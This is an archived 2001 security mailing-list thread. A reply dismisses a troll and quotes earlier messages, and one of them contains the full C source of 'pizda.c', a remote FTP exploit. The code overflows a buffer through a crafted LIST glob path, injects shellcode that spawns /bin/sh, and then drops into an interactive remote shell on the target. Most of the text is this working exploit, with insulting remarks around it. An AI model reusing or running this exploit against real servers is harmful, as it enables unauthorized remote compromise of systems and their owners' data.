-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Um, haven't you guys ever been trolled before? The worst thing you can do is reply to a luser like that... I know a few sites will start archiving the "exploit" and giving him credit for someone elses code, but other than notify the gullible it is probably best to ignore him and get SF to stop authorising his posts. Otherwise these lists will get as bad as /. BTW I dont want to perpeutate this, though... so mail me in private rather than to the list with flames... Russ - -----------------------------------------+ Russ Spooner (Mobile : 07771 544971) | Interrorem: Network Security Specialists | Software vulnerability testing & defence | Protecting business : www.interrorem.com | > -----Original Message----- > From: Brad Doctor [mailto:bdoctor@ps-ax.com] > Sent: 07 June 2001 05:01 > To: Fsck Theo Deraadt > Cc: miscat_private; vuln-devat_private; > bugtraqat_private; submissionsat_private; > securityat_private; theoat_private > Subject: Re: Another sploit makes 2 in one day > > > I have no problem at all with this sort of thing, but it bothers me > when people steal code and call it their own. That is just > pathetic. > > http://www.securityfocus.com/templates/archive.pike?list=1&mid=17692 > 2 > > -brad > > > > At 12:47 PM 6/6/2001 -0700, Fsck Theo Deraadt wrote: > >So openbsd'ers complained to my mail provider because > >they dont like when people show them up with code to > >prove they lie about things and try to hush up > >everyone. Its okay though no bad feelings so here it > >is in your face pizda.c > > > >// > >// Pizda.c > >// Hello all I have to now post this because I keep it > >low key > >// for long for my love of Openbsd but after Theo lied > >to all > >// I decided to release this to the public domain to > >show what > >// all claim no one could do which is prove them wrong > >so here > >// it go for all to see how fast they try to fix > >before some > >// people see how much problems this things cause. > >// copyraadt 2001 by Jigglypuff of HackMasterZ > >// Theo: kurite moju trubku > >// > > > > > > > >#include <sys/types.h> > >#include <sys/socket.h> > >#include <netinet/in.h> > >#include <netdb.h> > >#include <stdio.h> > >#include <unistd.h> > >#include <stdlib.h> > >#include <string.h> > > > >extern char *optarg; > >static int debug; > >int cflag, lflag, sflag; > > > >char shellcode[] = > >"\x31\xc0\x50\x50\xb0\xb7\xcd\x80" > >"\x58\x50\x66\x68\x2e\x2e\x89\xe1" > >"\x50\x51\x50\xb0\x05\xcd\x80\x89" > >"\xc3\x58\x50\x68\x61\x64\x66\x61" > >"\x89\xe2\x66\x68\x6d\x01\x52\x50" > >"\xb0\x88\xcd\x80\xb0\x3d\xcd\x80" > >"\x53\x50\xb0\x01\x83\xc0\x0c\xcd" > >"\x80\x51\x50\x31\xc9\xb1\x64\xb0" > >"\x0c\xcd\x80\xe2\xfa\xb0\x3d\xcd" > >"\x80\x31\xc0\x50\x68\x2f\x2f\x73" > >"\x68\x68\x2f\x62\x69\x6e\x89\xe3" > >"\x50\x53\x50\x54\x53\xb0\x3b\x50" > >"\xcd\x80\xc3"; > > > >#define THEO "THEO ftp\r\n" > >#define SUXX "SUXX -user@\r\n" > > > >void usage(const char *); > >void docmd(int s, const char *cmd, int print); > >void communicate(int s); > > > >int main(int argc, char *argv[]) > >{ > > char expbuf[512] = "LIST ", *basedir, option; > > char commandbuf[512] = "", *hostname; > > int cnt, dirlen, explen, sendlen; > > int s, port = 21, pad; > > long retaddr; > > struct sockaddr_in sin; > > struct hostent *he; > > > > while((option = getopt(argc, argv, "dc:l:p:s:")) != > >-1) > > switch(option) > > { > > case 'd': > > debug++; > > break; > > case 'c': > > cflag = 1; > > basedir = optarg; > > break; > > case 'l': > > lflag = 1; > > dirlen = atoi(optarg); > > if(dirlen < 16) > > { > > usage(argv[0]); > > exit(0); > > } > > break; > > case 'p': > > port = atoi(optarg); > > break; > > case 's': > > sflag = 1; > > retaddr = strtoul(optarg, 0, 0); > > break; > > default: > > usage(argv[0]); > > exit(0); > > } > > > > if(!cflag || !lflag) > > { > > usage(argv[0]); > > exit(0); > > } > > > > if(argc - optind == 1) > > hostname = argv[optind]; > > else > > { > > usage(argv[0]); > > exit(0); > > } > > > > if((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) > > { > > perror("socket"); > > exit(1); > > } > > > > if((he = gethostbyname(hostname)) == NULL) > > { > > herror(hostname); > > exit(0); > > } > > memset(&sin, 0, sizeof(struct sockaddr_in)); > > sin.sin_family = AF_INET; > > sin.sin_port = htons(port); > > memcpy(&sin.sin_addr, he->h_addr_list[0], > >sizeof(struct in_addr)); > > if(connect(s, (struct sockaddr *) &sin, > >sizeof(struct sockaddr_in)) == -1) > > { > > perror("connect"); > > exit(0); > > } > > > > if(debug) > > fprintf(stderr, "// basedir = \"%s\"\n", basedir); > > > > for(cnt = 0; cnt < 1024/(dirlen+4)-1; cnt++) > > strcat(expbuf, "*/../"); > > strcat(expbuf, "*/"); > > if(debug) > > fprintf(stderr, "// expbuf = \"%s\"\n", expbuf); > > > > explen = cnt*(dirlen+4) + dirlen + 1; > > if(debug) > > fprintf(stderr, "// explen = %d\n", explen); > > > > sendlen = strlen(expbuf); > > if(debug) > > fprintf(stderr, "// sendlen = %d\n", sendlen); > > > > docmd(s, "", 0); > > > > docmd(s, THEO, 0); > > docmd(s, SUXX, 1); > > > > snprintf(commandbuf, sizeof(commandbuf), "CWD > >%s\r\n", basedir); > > docmd(s, commandbuf, 1); > > > > pad = 1027 - explen; > > if(debug) > > fprintf(stderr, "// pad = %d\n", pad); > > > > for(; pad >= 0; pad--) > > strcat(expbuf, "x"); > > > > if(!sflag) > > { > > switch(dirlen) > > { > > case 16: > > retaddr = 0xdfbeab60; > > case 26: > > retaddr = 0xdfbefe40; > > default: > > retaddr = 0xdfbeba20 + (dirlen-17)*0x9c0; > > } > > retaddr+=20; > > } > > > > fprintf(stderr, "retaddr = %.8lx\n", retaddr); > > strncat(expbuf, (char *) &retaddr, 4); > > > > for(cnt = strlen(expbuf); cnt < > >508-strlen(shellcode); cnt++) > > strcat(expbuf, "\x90"); > > > > strcat(expbuf, shellcode); > > > > strcat(expbuf, "\r\n"); > > > > fprintf(stderr, "Press EnTeR.."); fflush(stderr); > > fgets(commandbuf, sizeof(commandbuf)-1, stdin); > > > > docmd(s, expbuf, 0); > > > > fprintf(stderr, "remember Theo is a liar > >\"adfa\"-dir\n"); > > communicate(s); > > > > return 0; > >} > > > >void usage(const char *s) > >{ > > fprintf(stderr, "Usage %s [-s retaddr] [-d] -c dir > >-l dirlen(>=16) [-p port] hostname\n", s); > >} > > > >void docmd(int s, const char *cmd, int print) > >{ > > char uglybuf[1024]; > > int len; > > fd_set rfds; > > struct timeval tv; > > > > len = strlen(cmd); > > if(debug) > > { > > write(STDERR_FILENO, "\\\\ ", 3); > > write(STDERR_FILENO, cmd, len); > > } > > if(send(s, cmd, len, 0) != len) > > { > > perror("send"); > > exit(0); > > } > > > > FD_ZERO(&rfds); > > FD_SET(s, &rfds); > > tv.tv_sec = 1; > > tv.tv_usec = 0; > > select(s+1, &rfds, NULL, NULL, &tv); > > if(FD_ISSET(s, &rfds)) > > { > > if((len = recv(s, uglybuf, sizeof(uglybuf), 0)) > >< 0) > > { > > perror("recv"); > > exit(0); > > } > > if(len == 0) > > { > > fprintf(stderr, "EOF on socket. Sorry.\n"); > > exit(0); > > } > > if(debug || print) > > { > > write(STDERR_FILENO, "// ", 3); > > write(STDERR_FILENO, uglybuf, len); > > } > > } > >} > > > >void communicate(int s) > >{ > > char buf[1024]; > > int len; > > fd_set rfds; > > > > while(1) > > { > > FD_ZERO(&rfds); > > FD_SET(STDIN_FILENO, &rfds); > > FD_SET(s, &rfds); > > select(s+1, &rfds, NULL, NULL, NULL); > > if(FD_ISSET(STDIN_FILENO, &rfds)) > > { > > if((len = read(STDIN_FILENO, buf, > >sizeof(buf))) <= 0) > > return; > > if(send(s, buf, len, 0) == -1) > > return; > > } > > if(FD_ISSET(s, &rfds)) > > { > > if((len = recv(s, buf, sizeof(buf), 0)) <= > >0) > > return; > > if(write(STDOUT_FILENO, buf, len) == -1) > > return; > > } > > } > >} > > > > > > > > > >__________________________________________________ > >Do You Yahoo!? > >Get personalized email addresses from Yahoo! Mail - only $35 > >a year! http://personal.mail.yahoo.com/ -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com> iQA/AwUBOx9KwVKMcg0VZCu/EQIlbACgjLXOLn4VXMWzLVlubwTzw84mkhQAoOLk PifgvvoXTU27uKzrZ4eBrPC5 =THgO -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Thu Jun 07 2001 - 08:13:46 PDT